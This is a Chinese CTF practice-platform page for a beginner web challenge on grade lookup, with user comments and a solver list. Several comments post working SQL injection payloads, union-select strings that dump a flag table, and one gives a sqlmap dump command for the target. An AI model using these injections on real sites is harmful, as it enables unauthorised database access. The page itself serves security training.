成绩查询WEB 未解决

分数: 25 金币: 2
题目作者: 未知
一  血: npfs
一血奖励: 1金币
解  决: 11515
提  示:
描  述:
来源山科大ctf
评论
zoey123 3年前

很好,适合新手

回复 0

sudopacman 3年前

萌新打得最心惊胆战的一道题,第一次碰sqlmap,不知道为什么-u "[path]"出来一直报错,最后手工暴力做出来了

回复 0

4549 3年前

赞,很适合新手

回复 1

goodfxxkingbye 3年前

id=-1' union select 1,2,3,group_concat(skctf_flag) from fl4g#

回复 3
him9947 2年前

你是我大哥

回复 2

lzh20030509 3年前

评论区yyds

回复 0

15305265925 3年前

id=-1' union select 1,2,group_concat(skctf_flag),4 from fl4g-- -

回复 1

xiaoxhw 3年前

利用”不显示“代表”报错“

回复 2

笨笨笨蛋 3年前

我sqlmap进入fl4g后查看内容压根没有flag,可是手工注入又有了,这是为什么?求一个大佬解释一下

回复 0
aWxvdmVjdGY 3年前

fl4g 是db,然后找table,在找cloumns,最后dump

回复 0

教练我要打亚索 3年前

先猜一下字段,我也是没猜字段直接取数据 没取到,需要先取一下字段 然后再来取数据

回复 0

笨笨笨蛋 3年前

有大佬用sqlmap做的吗?我想看看sqlmap怎么做这个题目

回复 0
摆烂选手 2年前

@charonzzw 阿巴阿巴,摆烂选手大眼瞪小眼,咋搞啊。有没有会的,哭了

回复 0

theonlypopcat 3年前

sqlmap --url="http://靶场地址/index.php" --data="id=1" -D skctf -T fl4g -C skctf_flag --dump

回复 0

charonzzw 3年前

用burp去抓包 然后copy to flie 形成txt文件,sqlmap去运行这个包 然后依次查库 表 列就出flag了

回复 1

秋刀鱼の丸 3年前

1' and 1=2 union select 1,2,3,skctf_flag from fl4g#

回复 1

WriteUp

image
harry

2 金币

评分(24)

解题动态

基尼泰美 攻破了该题 10小时前
寒夜清风 攻破了该题 17小时前
十里故清云 攻破了该题 23小时前
sunset-w 攻破了该题 3天前
Heisemberg 攻破了该题 3天前
Memory621 攻破了该题 4天前
麻辣鸽子头 攻破了该题 4天前
MayBee 攻破了该题 5天前
2523822945 攻破了该题 6天前
kr2yh 攻破了该题 6天前
lichuangpro 攻破了该题 6天前
qq1002517 攻破了该题 6天前
潭影空人心 攻破了该题 7天前
爆汁酸菜鱼 攻破了该题 7天前
czl2025 攻破了该题 7天前
sssyyyttt 攻破了该题 8天前
simple9527 攻破了该题 8天前
Arno_Zoffy 攻破了该题 9天前
满楼红袖招 攻破了该题 9天前
Jasmine_Iris 攻破了该题 10天前
问题反馈